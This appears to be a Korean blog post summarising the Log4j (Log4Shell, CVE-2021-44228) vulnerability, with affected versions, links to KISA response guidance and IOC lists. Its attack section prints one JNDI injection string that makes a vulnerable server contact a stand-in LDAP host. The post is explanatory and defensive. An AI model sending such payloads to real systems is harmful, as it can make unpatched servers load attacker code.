Log4j 취약점! / CVE-2021-44228

이번에 전 세계에서 이슈인 Log4j가 있어 인터넷에서 찾은 정보를 한곳에 정리 해봤다! 

 

1. Log4j 란? 

- Apache Software Foundation에서 개발

- Java 로깅 프레임 워크로 프로그램의 로그 남기는 라이브러리

- 대부분의 프로그램에서 사용하고 있어 더욱 심각한 취약점이다. 

 

2. 어떤 취약점인가? 

- CVE-2021-44228

- 한줄의 코드 만으로 서버에 원하는 명령을 내려 공격자가 원하는 기능 수행 가능. 

- 디렉토리(LDAP 디렉토리)를 통해 데이터를 찾기 위해 Java 프로그램에서 사용하는 Java Naming and Directory Interface (JNDI)를 사용

 

백문이 불여일견, 아래 영상을 보면 어떤 느낌인지 이해가 된다

https://youtu.be/NOxSLe5GjOk

3. 공격 방식

${jndi:ldap://example.com/a}

- 위와 같은 코드 한줄이면 공격자가 원하는 곳 example.com으로 접속하도록 가능하다. 

- 이 외에도 여러 악용된 방법이 계속 등장하고 있다. 

 

4. 영향을 받는 버전 / CVE-2021-45105
o CVE-2021-44228
   - 2.0-beta9 ~ 2.14.1 버전 (Log4j 2.12.2 제외)
 o CVE-2021-45046
   - 2.0-beta9 ~ 2.12.1 및 2.13.0 ~ 2.15.0 버전
 o CVE-2021-4104
   - 1.x 버전
      ※ JMSAppender를 사용하지 않는 경우 취약점 영향 없음

 

5. 취약점 대응 가이드

- 아래 사이트의 첨부파일에 쉽게 설명되어 있어 참고 하면 될 것 같다

- 계속해서 새로운 취약점과 버전이 나오고 있고 당분간 계속 모니터링 필요!! 

https://www.boho.or.kr/data/guideView.do?bulletin_writing_sequence=36390 

KISA 인터넷 보호나라&KrCERT

 

6. IOC 정보

- Log4j와 관련된 IOC 정보는 아래 사이트에서 잘 나와 있다

https://gist.github.com/blotus/f87ed46718bfdc634c9081110d243166

IPs exploiting the log4j2 CVE-2021-44228 detected by the crowdsec community

 

참고 사이트

1. https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36389&queryString=cGFnZT0xJnNvcnRfY29kZT0mc29ydF9jb2RlX25hbWU9JnNlYXJjaF9zb3J0PXRpdGxlX25hbWUmc2VhcmNoX3dvcmQ9